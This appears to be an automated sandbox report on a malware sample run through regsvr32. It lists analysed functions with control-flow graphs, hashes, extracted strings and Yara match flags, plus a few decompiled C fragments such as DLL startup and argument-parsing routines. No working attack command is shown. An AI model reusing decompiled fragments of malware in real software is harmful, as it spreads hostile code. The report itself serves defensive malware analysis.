                                                                                                                                                                                                            • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                            • Instruction ID: 36cd00cb8e3bc192fcd0e666ed444ea9c955e82ad11a06419bb7688c792a3f41
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A52F330618B488BC719DF18D8857BAB7E1FB94304F18562EE89BD7351DB34E942CB86
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F709C Relevance: 11.5, Strings: 9, Instructions: 237COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #Vk$$$8$U[$W(P$_L$_o$k|$xD
                                                                                                                                                                                                            • API String ID: 0-383957222
                                                                                                                                                                                                            • Opcode ID: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                                                                                                                            • Instruction ID: 489ffb11aab2cce4f1690b29e18dba401bcbd1025df2be3320e691303e37b4f8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7C1CC71519780AFD388DF28C58A91BBBF1FBD4754F906A1DF886862A0D7B4D909CF02
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180010C10 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78librarymemorynativeCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AccessAllocateFindMemoryResourceResource_Virtual
                                                                                                                                                                                                            • String ID: @$LXGUM$ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk
                                                                                                                                                                                                            • API String ID: 2485490239-3005932707
                                                                                                                                                                                                            • Opcode ID: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                                                                                                                            • Instruction ID: 10e411743ffb1a55a6adb62272a00c62f4f605c25ab8d9ba5168281e261d5f46
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F41F976218B8486D795CB14F49039AB7B4F388794F505116FADA83BA8DF7DC608CB00
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E7D6C Relevance: 7.7, Strings: 6, Instructions: 201COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 260 28e7d6c-28e7d9a 261 28e7d9c-28e7da4 260->261 262 28e804a-28e80a9 call 28fa474 261->262 263 28e7daa-28e7dad 261->263 273 28e80ab-28e80b0 262->273 274 28e80b5 262->274 265 28e7ff4-28e8045 call 28f6048 263->265 266 28e7db3-28e7db9 263->266 265->261 269 28e7dbf-28e7dc5 266->269 270 28e7f53-28e7fef call 28ffdcc 266->270 275 28e80ba-28e80c0 269->275 276 28e7dcb-28e7ec1 call 28fbb78 269->276 270->261 273->261 274->275 279 28e80c6 275->279 280 28e7f40-28e7f52 275->280 281 28e7ec6-28e7ecc 276->281 279->261 282 28e7ece-28e7ed5 281->282 283 28e7edf-28e7f3b call 28f8f30 281->283 282->283 283->280
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: )s$)y_$3`d!$GX$lo$=
                                                                                                                                                                                                            • API String ID: 0-308291206
                                                                                                                                                                                                            • Opcode ID: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                                                                                                                            • Instruction ID: 866cd51dfd9310ef550721f5d96af8008e3c892837d1e855febeed4893c43a77
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A91477550074A8BDF48CF28C88A4DE3FA1FB58398F65422CEC4AA6290D778D695CFC5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FA000 Relevance: 7.7, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 285 28fa000-28fa0cc call 28f9f38 call 28f2404 290 28fa22c-28fa243 285->290 291 28fa0d2-28fa16a call 28f9424 285->291 293 28fa16f-28fa227 call 28fc2c0 291->293 293->290
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: /Q$;$F8$KT$F$Z
                                                                                                                                                                                                            • API String ID: 0-1951868783
                                                                                                                                                                                                            • Opcode ID: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                                                                                                                            • Instruction ID: 18f2e77c5065b32fba61b2f142f821c91e4e28e29da5af853b41f9175e0044b6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF6156B0E107098FCB48CFA8D88A8DEBBB1FB58314F10821DE846A7290D7749995CFD5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180010AC0 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                            			E00000001180010AC0(long long _a8, intOrPtr _a16, long long _a24) {
				long long _v32;
				long long _v40;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _t15;
				long long _t19;
				long long _t20;

				_a24 = _t20;
				_a16 = _t15;
				_a8 = _t19;
				_v56 = _a16;
				if (_v56 == 1) goto 0x80010ae6;
				goto 0x80010bf4;
				 *0x80022ca0 = _a8;
				_v52 = 0x904;
				_v48 = 0xf9e;
				_v40 = 0;
				_v32 = 0;
				if (E00000001180010DB0(_a16) == 0) goto 0x80010b28;
				ExitProcess(??);
			}











                                                                                                                                                                                                            0x180010ac0
                                                                                                                                                                                                            0x180010ac5
                                                                                                                                                                                                            0x180010ac9
                                                                                                                                                                                                            0x180010ad6
                                                                                                                                                                                                            0x180010adf
                                                                                                                                                                                                            0x180010ae1
                                                                                                                                                                                                            0x180010aeb
                                                                                                                                                                                                            0x180010af2
                                                                                                                                                                                                            0x180010afa
                                                                                                                                                                                                            0x180010b02
                                                                                                                                                                                                            0x180010b0b
                                                                                                                                                                                                            0x180010b1b
                                                                                                                                                                                                            0x180010b22

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                            • Opcode ID: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                                                                                                                            • Instruction ID: 35b30a5bd3bbc3bfa3955963e6b6c4c9d1147ff83b5bb424c40f1a31c42fa1fb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE311671119B489AE782DF54F85438AB7A0F7983D4F608215F6A907BA4CFBDC24CCB40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028ECC14 Relevance: 4.1, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 309 28ecc14-28ecc36 310 28ecc40 309->310 311 28ecc42-28ecc48 310->311 312 28ecc4e-28ecc54 311->312 313 28ecfbb-28ed136 call 290826c call 28e1718 311->313 315 28ecc5a-28ecc60 312->315 316 28ecfb1-28ecfb6 312->316 326 28ed13d-28ed314 call 28e1718 call 2901ac4 313->326 327 28ed138 313->327 318 28ed31f-28ed325 315->318 319 28ecc66-28ecc73 315->319 316->311 318->311 320 28ed32b-28ed338 318->320 322 28ecc75-28eccae 319->322 323 28eccb0-28ecccb 319->323 325 28eccd5-28ecf8f call 28e8870 call 28e1718 call 2901ac4 322->325 323->325 339 28ecf94-28ecf9c 325->339 326->310 337 28ed31a 326->337 327->326 337->318 339->320 340 28ecfa2-28ecfac 339->340
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 0c$\$c2&
                                                                                                                                                                                                            • API String ID: 0-1001447681
                                                                                                                                                                                                            • Opcode ID: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                                                                                                                            • Instruction ID: 7db8eb9707bc1cc24b4299e4b74f4ce1ecbcdd735324f442ebcfb2c1e44d3687
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5702F7755083C88BEBBECF64C8896DE7BADFB44708F10511DEA0A9E298DB745744CB41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E8BC8 Relevance: 4.0, Strings: 3, Instructions: 213COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 341 28e8bc8-28e8c26 call 28f9f38 344 28e8c2b-28e8c30 341->344 345 28e8e8a-28e8e9a call 28e2c08 344->345 346 28e8c36-28e8c3b 344->346 353 28e8e9c-28e8ea1 345->353 354 28e8ea6 345->354 348 28e8e7b-28e8e85 346->348 349 28e8c41-28e8c43 346->349 348->344 351 28e8eb8-28e8f90 call 28fc2c0 349->351 352 28e8c49-28e8c4e 349->352 361 28e8f95-28e8fad 351->361 355 28e8c54-28e8c59 352->355 356 28e8d71-28e8e5f call 28f52c0 352->356 353->344 360 28e8ea8-28e8ead 354->360 358 28e8c5f-28e8c64 355->358 359 28e8d10-28e8d6a call 28f8d60 355->359 366 28e8e64-28e8e6b 356->366 358->360 363 28e8c6a-28e8d0b call 28fbf94 358->363 368 28e8d6f Process32FirstW 359->368 360->361 364 28e8eb3 360->364 363->344 364->344 366->361 369 28e8e71-28e8e76 366->369 368->356 369->344
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: .f$M$N5
                                                                                                                                                                                                            • API String ID: 0-1477915503
                                                                                                                                                                                                            • Opcode ID: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                                                                                                                            • Instruction ID: f1fde3c7aefe25725c99856c336007e5099ca130310444da9653b4a6b3368c56
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAA15E741197449FDBA8DF28C4C959EBBE1FB84304F905A1DF88ADB2A0CB74D945CB42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F8FC8 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 483 28f8fc8-28f8ff9 call 28f9f38 486 28f9000 483->486 487 28f9005-28f900b 486->487 488 28f9354-28f93f0 call 28f464c 487->488 489 28f9011-28f9017 487->489 497 28f93f5 488->497 491 28f901d-28f9023 489->491 492 28f9134-28f9235 call 28feac0 call 2901684 489->492 494 28f912a-28f912f 491->494 495 28f9029-28f902b 491->495 504 28f923a-28f934f call 28e87dc 492->504 494->487 498 28f93fa-28f9400 495->498 499 28f9031-28f9125 call 28f49b0 495->499 497->498 498->487 501 28f9406-28f9421 498->501 499->486 504->497
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: A]jN
                                                                                                                                                                                                            • API String ID: 0-1761522205
                                                                                                                                                                                                            • Opcode ID: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                                                                                                                            • Instruction ID: 7b7d16fe9b4abde8c094d15995ea42182cc0cc41a812a2965f1e339de3a04fb9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1D1E5B5D0060A8FDF48DFA8C48A4AEBBB1FB54304F11422DD516B7290D7785A46CFD1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E263C Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: C
                                                                                                                                                                                                            • API String ID: 0-3705061908
                                                                                                                                                                                                            • Opcode ID: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                                                                                                                            • Instruction ID: 36e3af92f2ae1fb53de0e7b42cf624e67ff309aeeb8522e98a080b7d7afbaa20
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9961CF7551C7848BD768DF28C18940FBBF1FBD6748F000A1DE69A862A0D7B6D958CF42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000000018000147C Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 134 18000147c-180001482 135 180001484-180001487 134->135 136 1800014bd-1800014c7 134->136 137 1800014b1-1800014f0 call 180001268 135->137 138 180001489-18000148c 135->138 139 1800015e4-1800015f9 136->139 154 1800014f6-18000150b call 1800010fc 137->154 155 1800015be 137->155 140 1800014a4 __scrt_dllmain_crt_thread_attach 138->140 141 18000148e-180001491 138->141 142 180001608-180001622 call 1800010fc 139->142 143 1800015fb 139->143 149 1800014a9-1800014b0 140->149 145 180001493-18000149c 141->145 146 18000149d-1800014a2 call 1800011ac 141->146 157 180001624-180001659 call 180001224 call 180001e54 call 180001ed0 call 1800013d8 call 1800013fc call 180001254 142->157 158 18000165b-18000168c call 180001c48 142->158 147 1800015fd-180001607 143->147 146->149 166 180001511-180001522 call 18000116c 154->166 167 1800015d6-1800015e3 call 180001c48 154->167 159 1800015c0-1800015d5 155->159 157->147 168 18000169d-1800016a3 158->168 169 18000168e-180001694 158->169 185 180001573-18000157d call 1800013d8 166->185 186 180001524-180001548 call 180001e94 call 180001e44 call 180001e70 call 180006da0 166->186 167->139 174 1800016a5-1800016af 168->174 175 1800016ea-1800016f2 call 180010ac0 168->175 169->168 173 180001696-180001698 169->173 180 18000178b-180001798 173->180 181 1800016b1-1800016b9 174->181 182 1800016bb-1800016c9 174->182 187 1800016f7-180001700 175->187 188 1800016cf-1800016d7 call 18000147c 181->188 182->188 198 180001781-180001789 182->198 185->155 206 18000157f-18000158b call 180001e8c 185->206 186->185 234 18000154a-180001551 __scrt_dllmain_after_initialize_c 186->234 194 180001702-180001704 187->194 195 180001738-18000173a 187->195 200 1800016dc-1800016e4 188->200 194->195 203 180001706-180001728 call 180010ac0 call 1800015e4 194->203 196 180001741-180001756 call 18000147c 195->196 197 18000173c-18000173f 195->197 196->198 215 180001758-180001762 196->215 197->196 197->198 198->180 200->175 200->198 203->195 229 18000172a-18000172f 203->229 223 1800015b1-1800015bc 206->223 224 18000158d-180001597 call 180001340 206->224 220 180001764-18000176b 215->220 221 18000176d-18000177d 215->221 220->198 221->198 223->159 224->223 233 180001599-1800015a7 224->233 229->195 233->223 234->185 235 180001553-180001570 call 180006d5c 234->235 235->185
                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                            			E0000000118000147C(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x800014bd;
				if (_t5 == 0) goto 0x800014b1;
				if (_t5 == 0) goto 0x800014a4;
				if (__edx == 1) goto 0x8000149d;
				return 1;
			}




                                                                                                                                                                                                            0x180001480
                                                                                                                                                                                                            0x180001482
                                                                                                                                                                                                            0x180001487
                                                                                                                                                                                                            0x18000148c
                                                                                                                                                                                                            0x180001491
                                                                                                                                                                                                            0x18000149c

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 190073905-0
                                                                                                                                                                                                            • Opcode ID: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                                                                                                                            • Instruction ID: c036cf0e1e542974e7afb98f421e14e504817ee7e551922961311e630d73ddb8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5881C370A04A4DCEFBD7DB65A8413D932A0AB9D7C2F54C125B909477A6DF38C74D8700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00000001800063CC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                                                                            			E000000011800063CC(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t31;
				intOrPtr _t37;
				void* _t50;
				intOrPtr* _t67;
				long long _t73;
				void* _t75;
				long long _t89;
				signed int _t90;
				void* _t91;
				intOrPtr* _t92;
				void* _t95;
				void* _t98;

				_t98 = __r8;
				_t75 = __rcx;
				_a8 = __rbx;
				r14d = __ecx;
				if (__ecx == 0) goto 0x8000653f;
				_t2 = _t75 - 1; // -1
				if (_t2 - 1 <= 0) goto 0x8000640a;
				E000000011800086F4(_t2 - 1, __rax);
				_t3 = _t90 + 0x16; // 0x16
				 *__rax = _t3;
				E000000011800085B8();
				goto 0x8000653f;
				E00000001180009CD8(_t50, __rbx, _t91);
				r8d = 0x104;
				E000000011800093BC(_t50, 0x80022250, _t75, 0x80022250, _t90, _t91, _t98);
				_t92 =  *0x80022630; // 0xf33350
				 *0x80022610 = 0x80022250;
				if (_t92 == 0) goto 0x8000643e;
				if ( *_t92 != dil) goto 0x80006441;
				_t67 =  &_a32;
				_a24 = _t90;
				_v56 = _t67;
				r8d = 0;
				_a32 = _t90;
				_t31 = E000000011800061A4(0x80022250, 0x80022250, 0x80022250, 0x80022250, _t95, _t98,  &_a24);
				r8d = 1;
				E0000000118000636C(_t31, _a24, _a32, _t98); // executed
				_t73 = _t67;
				if (_t67 != 0) goto 0x80006499;
				E000000011800086F4(_t67, _t67);
				 *_t67 = 0xc;
				E0000000118000878C(_t67, _a24);
				goto 0x80006403;
				_v56 =  &_a32;
				E000000011800061A4(_t73, 0x80022250, _t73, 0x80022250, _t95, _t67 + _a24 * 8,  &_a24);
				if (r14d != 1) goto 0x800064d1;
				_t37 = _a24 - 1;
				 *0x80022620 = _t73;
				 *0x80022618 = _t37;
				goto 0x8000653a;
				_a16 = _t90;
				0x80009298();
				if (_t37 == 0) goto 0x80006500;
				E0000000118000878C( &_a32, _a16);
				_a16 = _t90;
				E0000000118000878C( &_a32, _t73);
				goto 0x8000653f;
				_t89 = _a16;
				if ( *_t89 == _t90) goto 0x8000651b;
				if ( *((intOrPtr*)(_t89 + 8)) != _t90) goto 0x8000650f;
				 *0x80022618 = 0;
				_a16 = _t90;
				 *0x80022620 = _t89;
				E0000000118000878C(_t89 + 8, _t90 + 1);
				_a16 = _t90;
				E0000000118000878C(_t89 + 8, _t73);
				return _t37;
			}



















                                                                                                                                                                                                            0x1800063cc
                                                                                                                                                                                                            0x1800063cc
                                                                                                                                                                                                            0x1800063cc
                                                                                                                                                                                                            0x1800063e1
                                                                                                                                                                                                            0x1800063e6
                                                                                                                                                                                                            0x1800063ec
                                                                                                                                                                                                            0x1800063f2
                                                                                                                                                                                                            0x1800063f4
                                                                                                                                                                                                            0x1800063f9
                                                                                                                                                                                                            0x1800063fc
                                                                                                                                                                                                            0x1800063fe
                                                                                                                                                                                                            0x180006405
                                                                                                                                                                                                            0x18000640a
                                                                                                                                                                                                            0x180006416
                                                                                                                                                                                                            0x180006421
                                                                                                                                                                                                            0x180006426
                                                                                                                                                                                                            0x18000642d
                                                                                                                                                                                                            0x180006437
                                                                                                                                                                                                            0x18000643c
                                                                                                                                                                                                            0x180006441
                                                                                                                                                                                                            0x180006445
                                                                                                                                                                                                            0x18000644d
                                                                                                                                                                                                            0x180006452
                                                                                                                                                                                                            0x180006455
                                                                                                                                                                                                            0x18000645e
                                                                                                                                                                                                            0x180006467
                                                                                                                                                                                                            0x180006474
                                                                                                                                                                                                            0x180006479
                                                                                                                                                                                                            0x18000647f
                                                                                                                                                                                                            0x180006481
                                                                                                                                                                                                            0x18000648d
                                                                                                                                                                                                            0x18000648f
                                                                                                                                                                                                            0x180006494
                                                                                                                                                                                                            0x1800064ab
                                                                                                                                                                                                            0x1800064b0
                                                                                                                                                                                                            0x1800064b9
                                                                                                                                                                                                            0x1800064be
                                                                                                                                                                                                            0x1800064c0
                                                                                                                                                                                                            0x1800064c7
                                                                                                                                                                                                            0x1800064cf
                                                                                                                                                                                                            0x1800064d5
                                                                                                                                                                                                            0x1800064dc
                                                                                                                                                                                                            0x1800064e5
                                                                                                                                                                                                            0x1800064eb
                                                                                                                                                                                                            0x1800064f3
                                                                                                                                                                                                            0x1800064f7
                                                                                                                                                                                                            0x1800064fe
                                                                                                                                                                                                            0x180006500
                                                                                                                                                                                                            0x18000650d
                                                                                                                                                                                                            0x180006519
                                                                                                                                                                                                            0x18000651b
                                                                                                                                                                                                            0x180006523
                                                                                                                                                                                                            0x180006527
                                                                                                                                                                                                            0x18000652e
                                                                                                                                                                                                            0x180006536
                                                                                                                                                                                                            0x18000653a
                                                                                                                                                                                                            0x180006551

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00000001800063FE
